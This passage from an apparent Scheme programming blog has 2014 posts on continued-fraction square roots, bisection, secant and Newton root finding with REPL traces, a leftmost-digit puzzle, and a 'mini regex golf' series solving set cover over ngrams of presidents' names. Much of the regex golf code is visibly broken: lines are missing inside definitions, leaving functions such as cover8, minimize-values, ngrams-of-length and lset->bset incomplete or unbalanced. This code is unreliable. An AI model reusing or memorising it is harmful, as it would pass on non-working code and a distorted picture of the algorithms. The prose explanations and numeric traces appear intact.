value\n(gosper-sqrt (+ (* c value) d)\nc\n(+ (* (- a (* value c)) value)\n(- b (* value d)))\n(- a (* value c))))))\n\n1 ]=> (cf:render (gosper-sqrt 0 17 10 0))\n1.303840481040529742916594311485836883305618755782013091790079369...\n\n;; base 10, 100 digits\n1 ]=> (cf:render (gosper-sqrt 0 17 10 0) 10 100)\n1.303840481040529742916594311485836883305618755782013091790079369896765385576397896545183528886788497...\n```\n\n## Tuesday, August 26, 2014\n\n### Solutions in search of problems\n\nSuppose you have a function like `(define foo (lambda (x) (- (* x x x) 30)))` and you want to find `x` such that `(foo x)` = `0`. There are a few ways to go about this. If you can find two different `x` such that `(foo x)` is positive for one and negative for the other, then `(foo x)` must be zero somewhere in between. A simple binary search will find it.\n```(define (bisection-method f left right)\n(let* ((midpoint (average left right))\n(fmid (f midpoint)))\n(if (< (abs fmid) 1e-8)\nmidpoint\n(let ((fl (f left))\n(fr (f right)))\n(cond ((same-sign? fl fr) (error \"Left and right not on opposite sides.\"))\n((same-sign? fmid fr) (bisection-method f left midpoint))\n((same-sign? fl fmid) (bisection-method f midpoint right))\n(else (error \"shouldn't happen\")))))))\n\n(define (average l r) (/ (+ l r) 2))\n\n(define (same-sign? l r)\n(or (and (positive? l)\n(positive? r))\n(and (negative? l)\n(negative? r))))\n\n1 ]=> (cos 2)\n\n;Value: -.4161468365471424\n\n1 ]=> (cos 1)\n\n;Value: .5403023058681398\n\n1 ]=> (bisection-method cos 1.0 2.0)\n1. 
2.\n1.5 2.\n1.5 1.75\n1.5 1.625\n1.5625 1.625\n1.5625 1.59375\n1.5625 1.578125\n1.5703125 1.578125\n1.5703125 1.57421875\n1.5703125 1.572265625\n1.5703125 1.5712890625\n1.5703125 1.57080078125\n1.570556640625 1.57080078125\n1.5706787109375 1.57080078125\n1.57073974609375 1.57080078125\n1.570770263671875 1.57080078125\n1.5707855224609375 1.57080078125\n1.5707931518554687 1.57080078125\n1.5707931518554687 1.5707969665527344\n1.5707950592041016 1.5707969665527344\n1.570796012878418 1.5707969665527344\n1.570796012878418 1.5707964897155762\n1.570796251296997 1.5707964897155762\n1.570796251296997 1.5707963705062866\n1.5707963109016418 1.5707963705062866\n1.5707963109016418 1.5707963407039642\n;Value: 1.570796325802803```\nRather than selecting the midpoint between the two prior guesses, you can pretend that your function is linear between the guesses and interpolate where the zero should be. This can converge quicker.\n```(define (secant-method f x1 x2)\n(display x1) (display \" \") (display x2) (newline)\n(let ((f1 (f x1))\n(f2 (f x2)))\n(if (< (abs f1) 1e-8)\nx1\n(let ((x0 (/ (- (* x2 f1) (* x1 f2))\n(- f1 f2))))\n(secant-method f x0 x1)))))\n\n1 ]=> (secant-method cos 0.0 4.0)\n0. 4.\n2.418900874126076 0.\n1.38220688493168 2.418900874126076\n1.5895160570280047 1.38220688493168\n1.5706960159120333 1.5895160570280047\n1.5707963326223677 1.5706960159120333\n;Value: 1.5707963326223677\n```\nIf you know the derivative of `f`, then you can use Newton's method to find the solution.\n```(define (newtons-method f f-prime guess)\n(display guess) (display \" \") (newline)\n(let ((dy (f guess)))\n(if (< (abs dy) 1e-8)\nguess\n(let ((dy/dx (f-prime guess)))\n(newtons-method f f-prime (- guess (/ dy dy/dx)))))))\n\n1 ]=> (newtons-method cos (lambda (x) (- (sin x))) 2.0)\n2.\n1.5423424456397141\n1.5708040082580965\n1.5707963267948966\n;Value: 1.5707963267948966```\nHere's another example. We'll find the cube root of 30 by solving `(lambda (x) (- (* x x x) 30))`.\n```(define (cube-minus-thirty x) (- (* x x x) 30))\n\n1 ]=> (bisection-method cube-minus-thirty 0.0 4.0)\n0. 4.\n2. 4.\n3. 4.\n3. 3.5\n3. 3.25\n3. 3.125\n3.0625 3.125\n3.09375 3.125\n3.09375 3.109375\n3.1015625 3.109375\n3.10546875 3.109375\n3.10546875 3.107421875\n3.1064453125 3.107421875\n3.10693359375 3.107421875\n3.107177734375 3.107421875\n3.107177734375 3.1072998046875\n3.107177734375 3.10723876953125\n3.107208251953125 3.10723876953125\n3.1072235107421875 3.10723876953125\n3.1072311401367187 3.10723876953125\n3.1072311401367187 3.1072349548339844\n3.1072311401367187 3.1072330474853516\n3.107232093811035 3.1072330474853516\n3.107232093811035 3.1072325706481934\n3.1072323322296143 3.1072325706481934\n3.107232451438904 3.1072325706481934\n3.107232451438904 3.1072325110435486\n3.107232481241226 3.1072325110435486\n3.1072324961423874 3.1072325110435486\n3.107232503592968 3.1072325110435486\n3.107232503592968 3.1072325073182583\n3.107232505455613 3.1072325073182583\n3.107232505455613 3.1072325063869357\n;Value: 3.1072325059212744\n\n1 ]=> (secant-method cube-minus-thirty 0.0 4.0)\n0. 
4.\n1.875 0.\n8.533333333333333 1.875\n2.1285182547245376 8.533333333333333\n2.341649751209406 2.1285182547245376\n3.4857887202177547 2.341649751209406\n3.0068542655016235 3.4857887202177547\n3.0957153766467633 3.0068542655016235\n3.1076136741672546 3.0957153766467633\n3.1072310897513415 3.1076136741672546\n3.1072325057801455 3.1072310897513415\n;Value: 3.1072325057801455\n\n1 ]=> (define (cube-minus-thirty-prime x) (* 3 x x))\n\n1 ]=> (newtons-method cube-minus-thirty cube-minus-thirty-prime 4.0)\n4.\n3.2916666666666665\n3.1173734622300557\n3.10726545916981\n3.1072325063033337\n3.107232505953859\n;Value: 3.107232505953859```\n\n## Friday, August 22, 2014\n\n### Small puzzle solution\n\nBefore I give my solution, I'd like to describe the leftmost digit algorithm in a bit more detail.\n```(define (leftmost-digit base n)\n(if (< n base)\nn\n(let ((leftmost-pair (leftmost-digit (* base base) n)))\n(if (< leftmost-pair base)\nleftmost-pair\n(quotient leftmost-pair base)))))```\nThe idea is this: if we have a one digit number, we just return it, otherwise we recursively call `leftmost-digit` with the square of the base. Squaring the base will mean gobbling up pairs of digits in the recursive call, so we'll get back either a one or two digit answer from the recursion. If it is one digit, we return it, otherwise it's two digits and we divide by the base to get the left one.\n\nFor example, if our number is 12345678 and the base is 10, we'll make a recursive call with base 100. The recursive call will deal with number as if it were written `12 34 56 78` in base 100 and return the answer 12. Then we'll divide that by 10 to get the 1.\n\nSince we're squaring the base, we're doubling the number of digits we're dealing with on each recursive call. This leads to the solution in O(log log n) time. If we instrument `quotient`, you can see:\n```(leftmost-digit 10 816305093398751331727331379663195459013258742431006753294691576)\n816305093398751331727331379663195459013258742431006753294691576 / 100000000000000000000000000000000\n8163050933987513317273313796631 / 10000000000000000\n816305093398751 / 100000000\n8163050 / 10000\n816 / 100```\nA sixty-three digit number trimmed down to one digit with only five divisions.\n\nSo a simple solution to the puzzle is:\n```(define (leftmost-digit+ base n)\n(if (< n base)\n(values n 0)\n(call-with-values (lambda () (leftmost-digit+ (* base base) n))\n(lambda (leftmost-pair count)\n(if (< leftmost-pair base)\n(values leftmost-pair (* count 2))\n(values (quotient leftmost-pair base) (+ (* count 2) 1)))))))\n```\nThe second value is the count of how many digits we discard. If the number is less than the base, we return it and we discarded nothing. Otherwise, we make the recursive call with the base squared and get back two values, the leftmost pair and the number of pairs it discarded. If the leftmost pair is a single digit, we return it, otherwise we divide by the base. The number of digits discarded is simply twice the number discarded by the recursive call, plus one more if we had to divide.\n\nBut I don't see an easy way to separate finding the digit from finding the position. 
At first it seemed straightforward to just count the digits being discarded, but you can't decide whether to increment the count at each stage without determining if the leftmost part of the recursive call contains one or two digits.\n\n## Thursday, August 21, 2014\n\n### Just a small puzzle\n\nYou can get the most significant digit (the leftmost) of a number pretty quickly this way\n```(define (leftmost-digit base n)\n(if (< n base)\nn\n(let ((leftmost-pair (leftmost-digit (* base base) n)))\n(if (< leftmost-pair base)\nleftmost-pair\n(quotient leftmost-pair base)))))```\nThe puzzle is to adapt this code to return the position of the leftmost digit.\n\n`(leftmost-digit+ 10 46729885) would return two values, 4 and 7`\n\n## Friday, August 8, 2014\n\n### Mini regex golf 3: set cover\n\nI'm computing the set cover by incrementally adding items to be covered. Naturally, the order in which you add items changes the way the program progresses. I added code that picks an item to be added each iteration rather than just pulling the `car` off the front of a list.\n```(define (cover8 value->keys-table better-solution)\n\n(let ((value (car v-k-entry))\n(keys (cdr v-k-entry)))\n\n(write-string \"Adding value \") (write value) (newline)\n(write-string \" with keys \") (write keys) (newline)\n(write-string \" to \") (write (length solution-set))\n(write-string \" partial solutions.\") (newline)\n\n(let ((new-solutions\n(map make-new-solution (cartesian-product solution-set keys))))\n\n(let ((trimmed-solutions\n(trim-partial-solutions value->keys-table new-solutions)))\n\n(write-string \"Returning \") (write (length trimmed-solutions))\n(write-string \" of \") (write (length new-solutions))\n(write-string \" new partial solutions.\") (newline)\n\ntrimmed-solutions))))\n\n(define (cover v-k-entries)\n(cond ((pair? v-k-entries)\n(pick-v-k-entry value->keys-table v-k-entries\n(lambda (selected remaining)\n((null? v-k-entries)\n(list '()))\n(else (improper-list-error 'cover v-k-entries))))\n\n(let ((minimized (minimize-vktable value->keys-table better-solution)))\n(least-elements (cover minimized) better-solution)))\n\n(define (score v-k-entry)\n(let* ((matched-all\n(count-matching-items value->keys-table\n(lambda (other)\n(there-exists? (cdr v-k-entry)\n(lambda (key) (member key (cdr other)))))))\n(matched-remaining\n(count-matching-items v-k-entries\n(lambda (other)\n(there-exists? 
(cdr v-k-entry)\n(lambda (key) (member key (cdr other)))))))\n(matched-forward (- matched-all matched-remaining)))\n(cons matched-remaining matched-forward)))\n\n(let ((scored (map (lambda (v-k-entry) (cons (score v-k-entry) v-k-entry))\nv-k-entries)))\n\n(let ((picked\n(cdar\n(least-elements scored\n(lambda (left right)\n(let* ((len-l (length (cdr left)))\n(len-r (length (cdr right)))\n(lmr (caar left))\n(lmf (cdar left))\n(rmr (caar right))\n(rmf (cdar right)))\n(or (> len-l len-r)\n(and (= len-l len-r)\n(or (> lmf rmf)\n(and (= lmf rmf)\n(< lmr rmr)))))\n))))))\n\n(display \"Picking \") (write picked) (newline)\n\n(define (trim-partial-solutions value->keys-table partial-solutions)\n(let ((equivalent-solutions\n(map (lambda (entry) (cons (cdr entry) (car entry)))\n(collect-equivalent-partial-solutions value->keys-table\npartial-solutions))))\n(write-string \" Deleting \")\n(write (- (length partial-solutions) (length equivalent-solutions)))\n(write-string \" equivalent partial solutions.\")\n(newline)\n\n(remove-dominated-solutions value->keys-table\n(map lowest-scoring-equivalent-partial-solution\nequivalent-solutions))))\n```\nFinally, it turns out that computing dominating partial solutions is expensive, so I changed the set operations to use a bitmap representation:\n```(define (remove-dominated-solutions value->keys-table partial-solutions)\n(let ((before-length (length partial-solutions))\n(all-values (get-values value->keys-table)))\n(let ((table\n;; put the long ones in first\n(sort\n(map (lambda (partial-solution)\n(cons partial-solution\n(lset->bset all-values\n(map car (partial-solution-matches value->keys-table\npartial-solution)))))\npartial-solutions)\n(lambda (left right)\n(> (length (bset->lset all-values (cdr left)))\n(length (bset->lset all-values (cdr right))))))))\n\n(dominates-solution? solution))\n'()\ntable))))\n(write-string \" Removing \") (write (- before-length after-length))\n(write-string \" dominated solutions.\")\n(newline)\n\n(define (dominates-solution? solution)\n(let* ((partial-solution (car solution))\n(partial-solution-score (score partial-solution))\n(solution-matches-raw (cdr solution)))\n(lambda (other-solution)\n(let* ((other-partial-solution (car other-solution))\n(other-matches-raw (cdr other-solution)))\n(and\n(bset-superset? other-matches-raw solution-matches-raw)\n(<= (score other-partial-solution) partial-solution-score))))))\n\n(define (get-values v-k-table)\n'()\nv-k-table))\n\n(define (bset-element->bit universe element)\n(cond ((null? element) 0)\n(else (expt 2 (list-index (lambda (item) (eq? item element)) universe)))))\n\n(bset-union bset (bset-element->bit universe element)))\n\n(define (lset->bset universe lset)\n0\nlset))\n\n(define (bset->lset universe bset)\n(cond ((zero? bset) '())\n((even? bset) (bset->lset (cdr universe) (/ bset 2)))\n(else (cons (car universe) (bset->lset (cdr universe) (/ (- bset 1) 2))))))\n\n(define (bset-union left right) (bitwise-ior left right))\n\n(define (bset-superset? bigger smaller)\n;; Is every element of smaller in bigger?\n(zero? (bitwise-andc2 smaller bigger)))\n```\nThis code can now find the shortest regular expression consisting of letters and dots (and ^\\$) that matches one set of strings but not another.\n\nDepending on the strings, this can take quite a bit of time to run. Dotted expressions cause a combinatorical explosion in matching regexps (or substrings), but what makes it worse is that the dotted expressions tend to span different sets of strings. 
If two different dotted expressions, each with different matching sets of strings, appear in a single string, then the number of partial solutions will be multiplied by two as we try each different dotted expression.\n\nIt is characteristic of NP problems that it is easy to determine if you have a good solution, but quite hard to find it among a huge number of other, poor solutions. This problem exhibits this characteristic, but there is a bit more structure in the problem that we are exploiting. The word lists are drawn from the English language. This makes some bigrams, trigrams, etc. far, far, more likely to appear than others.\n\nShort words are much easier to process than longer ones because they simply contain fewer things to match. On the other hand, longer words tend to be dominated by shorter ones anyway.\n\nTo be continued...\n\n## Thursday, August 7, 2014\n\n### Mini regex golf 2: adding regular expressions\n\nIt wasn't too hard to add regular expressions to the substring version. What took a while was just tinkering with the code, breaking it, fixing it again, noticing an optimization, tinkering, etc. etc. In any case it works and here is some of it.\n```(define (make-extended-ngram-table winners losers)\n(let* ((initial-ngrams (generate-ngrams winners losers)))\n(write-string \"Initial ngrams: \") (write (length initial-ngrams))\n(newline)\n(map (lambda (winner)\n(cons winner\n(keep-matching-items initial-ngrams\n(lambda (ngram) (re-string-search-forward ngram winner)))))\nwinners)))\n\n(define (generate-ngrams winners losers)\n(write-string \"Generating ngrams...\")(newline)\n(let ((losing-ngram? (string-list-matcher losers)))\n(lset-union equal? answer (extended-ngrams losing-ngram? winner)))\n'()\nwinners)))\n\n(define (string-list-matcher string-list)\n(lambda (test-ngram)\n(there-exists? string-list\n(lambda (string)\n(re-string-search-forward test-ngram string)))))\n\n(define *dotification-limit* 4)\n(define *generate-ends-of-words* #t)\n(define *generate-dotted* #t)\n\n(define (ngrams-of-length n string)\n(do ((start 0 (1+ start))\n(end n (1+ end))\n\n(answer '() (let ((item (car tail)))\n(if (losing-ngram? dotted)\n(dotify item)))))\n((not (pair? tail))\n(if (null? tail)\n(improper-list-error 'generate-dotted tail)))))\n\n(define (dotify word)\n(cond ((string=? word \"\") (list \"\"))\n((> (string-length word) *dotification-limit*) (list word))\n(else\n(string-append replacement dotified)))\n(replacements (substring word 0 1))))\n'()\n(dotify (substring word 1 (string-length word)))))))\n\n(define (replacements string)\n(if (or (string=? string \"^\")\n(string=? string \"\\$\"))\n(list string)\n(list string \".\")))\n\n(define (extended-ngrams losing-ngram? 
string)\n(let ((string (if *generate-ends-of-words*\n(string-append \"^\" string \"\\$\")\nstring)))\n(do ((n 1 (+ n 1))\n(delete-matching-items (ngrams-of-length n string)\nlosing-ngram?))))\n((> n (string-length string))\n(if *generate-dotted*\nAdding the dotification greatly increases the number of ways to match words:\n```1 ]=> (extended-ngrams (string-list-matcher losers) \"lincoln\")\n\n;Value 15: (\"li\" \"ln\" \"ln\\$\" \"oln\" \".ln\" \"col\" \"lin\" \"li.\" \"^li\" \"o.n\\$\" \"oln\\$\" \".ln\\$\" \"col.\" \"c.ln\" \"..ln\" \"coln\" \".oln\" \"co.n\" \"n.ol\" \"..ol\" \"ncol\" \".col\" \"nc.l\" \"i.co\" \"inco\" \"i..o\" \"in.o\" \"lin.\" \"li..\" \"l.nc\" \"linc\" \"l..c\" \"li.c\" \"^li.\" \"^lin\" \"coln\\$\" \"ncoln\" \"incol\" \"linco\" \"^linc\" \"ncoln\\$\" \"incoln\" \"lincol\" \"^linco\" \"incoln\\$\" \"lincoln\" \"^lincol\" \"lincoln\\$\" \"^lincoln\" \"^lincoln\\$\")```\nThe table that maps words to their extended ngrams is quite large, but it can be reduced in size without affecting the solution to the set cover problem. If two regexps match exactly the same set of winning strings, then one can be substituted for the other in any solution, so we can discard all but the shortest of these. If a regexp matches a proper superset of another regexp, and the other regexp is at least the same length or longer, then the first regexp dominates the second one, so we can discard the second one.\n```(define (minimize-keys value->keys-table better-solution)\n(let* ((all-keys (get-keys value->keys-table))\n(equivalents (collect-equivalent-partial-solutions value->keys-table\n(map list all-keys)))\n(reduced (map (lambda (equivalent)\n(cons (car equivalent)\n(car (least-elements (cdr equivalent)\nbetter-solution))))\nequivalents))\n(dominants (collect-dominant-partial-solutions reduced better-solution))\n'()\ndominants)))\n\n(define (rebuild-entry entry)\n(cons (car entry) (keep-matching-items (cdr entry)\n(lambda (item) (member item good-keys)))))\n\n(write-string \"Deleting \") (write (- (length all-keys) (length good-keys)))\n(write-string \" of \") (write (length all-keys)) (write-string \" keys. \")\n(write (length good-keys)) (write-string \" keys remain.\")(newline)\n(map rebuild-entry value->keys-table)))\n\n(define (partial-solution-matches value->keys-table partial-solution)\n(keep-matching-items\nvalue->keys-table\n(lambda (entry)\n(there-exists? partial-solution (lambda (key) (member key (cdr entry)))))))\n\n(define (collect-equivalent-partial-solutions value->keys-table partial-solutions)\n\n(for-each (lambda (partial-solution)\n(map car (partial-solution-matches\nvalue->keys-table\npartial-solution))\n(list)\n(lambda (other)\npartial-solutions)\n\n(define (collect-dominant-partial-solutions equivalents better-solution)\n(define (dominates? left right)\n(and (superset? (car left) (car right))\n(not (better-solution (cdr right) (cdr left)))))\n\n(let ((sorted (sort equivalents\n(lambda (l r) (> (length (car l)) (length (car r)))))))\n(if (there-exists? answer (lambda (a) (dominates? a candidate)))\n'()\nsorted)))\n```\nWe can minimize the value->key-table in another way. If two values in the table are matched by the exact same set of keys, then we can delete one without changing the solution. 
If a value is matched by a small set of keys, and if another values is matched by a superset of these keys, then we can delete the larger one because if the smaller one matches, the larger one must match as well.\n```(define (minimize-values v-k-table)\n(let ((size-before (length v-k-table)))\n\n(define (dominated-value? entry)\n(let ((entry-value (car entry))\n(entry-keylist (cdr entry)))\n(there-exists? v-k-table\n(lambda (other-entry)\n(and (not (eq? entry other-entry))\n(let ((other-value (car other-entry))\n(other-keylist (cdr other-entry)))\n(let ((result (and (superset? entry-keylist other-keylist)\n(not (superset? other-keylist entry-keylist)))))\n(if result\n(begin (display \"Removing \")\n(write entry-value)\n(display \" dominated by \")\n(write other-value)\n(display \".\")\n(newline)\n))\nresult)))))))\n\n(let ((entry-value (car entry))\n(entry-keylist (cdr entry)))\n(lambda (other-entry)\n(let ((other-value (car other-entry))\n(other-keylist (cdr other-entry)))\n(let ((result (equal? entry-keylist other-keylist)))\n(if result\n(begin (display \"Removing \")\n(write entry-value)\n(display \" equivalent to \")\n(write other-value)\n(display \".\")\n(newline)\n))\nresult))))))\n\n(dominated-value? entry))\n\n(write-string \"Removed \") (write (- size-before (length answer)))\n(write-string \" dominated and equivalent values.\")\n(newline)\nEach time we remove values or keys, we might make more keys and values equivalent or dominated, so we iterate until we can no longer remove anything.\n```(define (minimize-vktable value->keys-table better-solution)\n(let* ((before-size (fold-left + 0 (map length value->keys-table)))\n(new-table\n(minimize-values\n(minimize-keys value->keys-table better-solution)))\n(after-size (fold-left + 0 (map length new-table))))\n(if (= before-size after-size)\nvalue->keys-table\n(minimize-vktable new-table better-solution))))```\nThe minimized table for the presidents looks like this:\n```((\"washington\" \"sh\" \"g..n\" \"n..o\" \".h.n\" \"a..i\")\n(\"monroe\" \"r.e\\$\" \"oe\")\n(\"van-buren\" \"u..n\" \"r.n\" \".b\" \"bu\" \"-\")\n(\"harrison\" \"r..s\" \"r.i\" \"i..n\" \"is.\" \"i.o\" \"a..i\")\n(\"polk\" \"po\")\n(\"taylor\" \"ay.\" \"ta\")\n(\"pierce\" \"ie.\" \"rc\" \"r.e\\$\")\n(\"buchanan\" \"bu\" \"a.a\" \".h.n\")\n(\"lincoln\" \"i..o\" \"li\")\n(\"grant\" \"an.\\$\" \"a.t\" \"ra\" \"r.n\" \"g..n\")\n(\"hayes\" \"h..e\" \"ye\" \"ay.\")\n(\"garfield\" \"el.\\$\" \"i.l\" \"ga\" \"ie.\" \"r.i\" \".f\" \"a..i\")\n(\"cleveland\" \"v.l\" \"an.\\$\")\n(\"mckinley\" \"n.e\" \"nl\" \"i.l\" \"m..i\")\n(\"roosevelt\" \".se\" \"oo\" \"v.l\" \"el.\\$\" \"r..s\")\n(\"taft\" \"a.t\" \"ta\" \".f\")\n(\"wilson\" \"ls\" \"i..o\")\n(\"harding\" \"r.i\" \"di\" \"a..i\")\n(\"coolidge\" \"oo\" \"li\")\n(\"hoover\" \"ho\" \"oo\")\n(\"truman\" \"u..n\" \"ma\")\n(\"eisenhower\" \"ho\" \".se\" \"h..e\" \"i..n\" \"is.\")\n(\"kennedy\" \"nn\" \"n.e\")\n(\"johnson\" \"j\")\n(\"nixon\" \"^n\" \"i..n\" \"i.o\" \"n..o\")\n(\"carter\" \"rt\" \"a.t\")\n(\"reagan\" \"ga\" \"a.a\")\n(\"bush\" \"bu\" \"sh\")\n(\"obama\" \".b\" \"ma\" \"a.a\" \"am\"))```\nAs you can see, we have reduced the original 2091 matching regexps to fifty.\n\nChanges to the set-cover code coming soon....\n\n## Friday, August 1, 2014\n\n### Mini regex golf\n\nI was intrigued by Peter Norvig's articles about regex golf.\n\nTo make things easier to think about, I decided to start with the simpler problem of looking for substrings. 
Here's code to extract the ngrams of a string:\n```(define (ngrams-of-length n string)\n(do ((start 0 (1+ start))\n(end n (1+ end))\n\n(define (ngrams string)\n(do ((n 1 (+ n 1))\nA solution is simply a list of ngrams. (Although not every list of ngrams is a solution!)\n```(define (solution? solution winners losers)\n(let ((matches-solution? (ngram-list-matcher solution)))\n(and (for-all? winners matches-solution?)\n(not (there-exists? losers matches-solution?)))))\n\n(define (ngram-list-matcher ngram-list)\n(lambda (test-string)\n(there-exists? ngram-list\n(lambda (ngram)\n(string-search-forward ngram test-string)))))\n```\nWe also want to know if an ngram appears in a given list of strings.\n```(define (string-list-matcher string-list)\n(lambda (test-ngram)\n(there-exists? string-list\n(lambda (string)\n(string-search-forward test-ngram string)))))\n\n(let ((matches-loser? (string-list-matcher losers)))\n(for-each\n(lambda (winner) (write-string winner) (write-string \": \")\n(write (reverse (delete-matching-items (ngrams winner) matches-loser?)))\n(newline))\nwinners)))\n\nwashington: (\"sh\" \"hi\" \"gt\" \"to\" \"was\" \"ash\" \"shi\" \"hin\" \"ngt\" \"gto\" ...)\njefferson: (\"j\" \"je\" \"ef\" \"ff\" \"fe\" \"rs\" \"jef\" \"eff\" \"ffe\" \"fer\" ...)\nmonroe: (\"oe\" \"onr\" \"nro\" \"roe\" \"monr\" \"onro\" \"nroe\" \"monro\" \"onroe\" \"monroe\")\njackson: (\"j\" \"ja\" \"ac\" \"ks\" \"jac\" \"ack\" \"cks\" \"kso\" \"jack\" \"acks\" ...)\nvan-buren: (\"-\" \"va\" \"n-\" \"-b\" \"bu\" \"van\" \"an-\" \"n-b\" \"-bu\" \"bur\" ...)\nharrison: (\"har\" \"arr\" \"rri\" \"ris\" \"iso\" \"harr\" \"arri\" \"rris\" \"riso\" \"ison\" ...)\npolk: (\"po\" \"pol\" \"olk\" \"polk\")\ntaylor: (\"ta\" \"yl\" \"lo\" \"tay\" \"ayl\" \"ylo\" \"lor\" \"tayl\" \"aylo\" \"ylor\" ...)\npierce: (\"rc\" \"ce\" \"pie\" \"ier\" \"erc\" \"rce\" \"pier\" \"ierc\" \"erce\" \"pierc\" ...)\nbuchanan: (\"bu\" \"uc\" \"ch\" \"na\" \"buc\" \"uch\" \"cha\" \"ana\" \"nan\" \"buch\" ...)\nlincoln: (\"li\" \"ln\" \"lin\" \"col\" \"oln\" \"linc\" \"inco\" \"ncol\" \"coln\" \"linco\" ...)\ngrant: (\"ra\" \"gra\" \"ran\" \"ant\" \"gran\" \"rant\" \"grant\")\nhayes: (\"ye\" \"hay\" \"aye\" \"yes\" \"haye\" \"ayes\" \"hayes\")\ngarfield: (\"ga\" \"rf\" \"fi\" \"gar\" \"arf\" \"rfi\" \"fie\" \"iel\" \"eld\" \"garf\" ...)\ncleveland: (\"lev\" \"vel\" \"ela\" \"clev\" \"leve\" \"evel\" \"vela\" \"elan\" \"cleve\" \"level\" ...)\nmckinley: (\"nl\" \"mck\" \"inl\" \"nle\" \"mcki\" \"kinl\" \"inle\" \"nley\" \"mckin\" \"ckinl\" ...)\nroosevelt: (\"oo\" \"os\" \"lt\" \"roo\" \"oos\" \"ose\" \"sev\" \"vel\" \"elt\" \"roos\" ...)\ntaft: (\"ta\" \"af\" \"ft\" \"taf\" \"aft\" \"taft\")\nwilson: (\"ls\" \"ils\" \"lso\" \"wils\" \"ilso\" \"lson\" \"wilso\" \"ilson\" \"wilson\")\nharding: (\"di\" \"har\" \"ard\" \"rdi\" \"din\" \"hard\" \"ardi\" \"rdin\" \"ding\" \"hardi\" ...)\ncoolidge: (\"oo\" \"li\" \"coo\" \"ool\" \"oli\" \"lid\" \"cool\" \"ooli\" \"olid\" \"lidg\" ...)\nhoover: (\"ho\" \"oo\" \"hoo\" \"oov\" \"hoov\" \"oove\" \"hoove\" \"oover\" \"hoover\")\ntruman: (\"tr\" \"ru\" \"ma\" \"tru\" \"rum\" \"uma\" \"man\" \"trum\" \"ruma\" \"uman\" ...)\neisenhower: (\"ei\" \"nh\" \"ho\" \"ow\" \"eis\" \"ise\" \"sen\" \"enh\" \"nho\" \"how\" ...)\nkennedy: (\"nn\" \"ed\" \"dy\" \"ken\" \"enn\" \"nne\" \"ned\" \"edy\" \"kenn\" \"enne\" ...)\njohnson: (\"j\" \"jo\" \"oh\" \"hn\" \"joh\" \"ohn\" \"hns\" \"john\" \"ohns\" \"hnso\" ...)\nnixon: (\"ni\" \"ix\" \"xo\" \"nix\" \"ixo\" \"xon\" \"nixo\" \"ixon\" \"nixon\")\ncarter: (\"rt\" 
\"car\" \"art\" \"rte\" \"cart\" \"arte\" \"rter\" \"carte\" \"arter\" \"carter\")\nreagan: (\"ea\" \"ag\" \"ga\" \"rea\" \"eag\" \"aga\" \"gan\" \"reag\" \"eaga\" \"agan\" ...)\nbush: (\"bu\" \"us\" \"sh\" \"bus\" \"ush\" \"bush\")\nclinton: (\"li\" \"to\" \"cli\" \"lin\" \"int\" \"nto\" \"ton\" \"clin\" \"lint\" \"into\" ...)\nobama: (\"ob\" \"ba\" \"am\" \"ma\" \"oba\" \"bam\" \"ama\" \"obam\" \"bama\" \"obama\")\n```\nWe can discard ngrams like \"shi\" because the shorter ngram \"sh\" will also match.\n```(define (dominant-ngrams string losing-ngram?)\n(do ((n 1 (+ n 1))\n(delete-matching-items\n(ngrams-of-length n string)\n(lambda (item)\n(lambda (ngram)\n(string-search-forward ngram item)))\n(losing-ngram? item))))\n\n(let ((matches-loser? (string-list-matcher losers)))\n(for-each\n(lambda (winner) (write-string winner) (write-string \": \")\n(write (dominant-ngrams winner matches-loser?))\n(newline))\nwinners)))\n\nwashington: (\"was\" \"to\" \"gt\" \"hi\" \"sh\")\njefferson: (\"rs\" \"fe\" \"ff\" \"ef\" \"j\")\nmonroe: (\"nro\" \"onr\" \"oe\")\njackson: (\"ks\" \"ac\" \"j\")\nvan-buren: (\"ren\" \"ure\" \"bu\" \"va\" \"-\")\nharrison: (\"iso\" \"ris\" \"rri\" \"arr\" \"har\")\npolk: (\"olk\" \"po\")\ntaylor: (\"lo\" \"yl\" \"ta\")\npierce: (\"ier\" \"pie\" \"ce\" \"rc\")\nbuchanan: (\"na\" \"ch\" \"uc\" \"bu\")\nlincoln: (\"inco\" \"col\" \"ln\" \"li\")\ngrant: (\"ant\" \"ra\")\nhayes: (\"hay\" \"ye\")\ngarfield: (\"eld\" \"iel\" \"fi\" \"rf\" \"ga\")\ncleveland: (\"ela\" \"vel\" \"lev\")\nmckinley: (\"mck\" \"nl\")\nroosevelt: (\"vel\" \"sev\" \"lt\" \"os\" \"oo\")\ntaft: (\"ft\" \"af\" \"ta\")\nwilson: (\"ls\")\nharding: (\"ard\" \"har\" \"di\")\ncoolidge: (\"li\" \"oo\")\nhoover: (\"oo\" \"ho\")\ntruman: (\"ma\" \"ru\" \"tr\")\neisenhower: (\"wer\" \"sen\" \"ise\" \"ow\" \"ho\" \"nh\" \"ei\")\nkennedy: (\"ken\" \"dy\" \"ed\" \"nn\")\njohnson: (\"hn\" \"oh\" \"j\")\nnixon: (\"xo\" \"ix\" \"ni\")\ncarter: (\"car\" \"rt\")\nreagan: (\"ga\" \"ag\" \"ea\")\nbush: (\"sh\" \"us\" \"bu\")\nclinton: (\"int\" \"to\" \"li\")\nobama: (\"ma\" \"am\" \"ba\" \"ob\")\n```\nIt's time to tackle the set cover problem. We want a set of ngrams that match all the strings. Obviously, if we pick an ngram from each of the strings we want to cover, we'll have a solution. For instance,\n```(let ((matches-loser? (string-list-matcher losers)))\n(solution? (delete-duplicates\n(map\n(lambda (winner) (car (dominant-ngrams winner matches-loser?)))\nwinners))\nwinners losers))\n;Value: #t\n```\nWe can cycle through all the possible solutions and then select the best one.\n```(define (mini-golf0 winners losers)\n(lowest-scoring\n(cover0 (make-dominant-ngram-table\nwinners\n(delete-losing-superstrings winners losers)))))\n\n(define (delete-losing-superstrings winners losers)\n(delete-matching-items\nlosers\n(lambda (loser)\n(there-exists? winners\n(lambda (winner)\n(string-search-forward winner loser))))))\n\n(define (make-dominant-ngram-table winners losers)\n(let ((losing-ngram? 
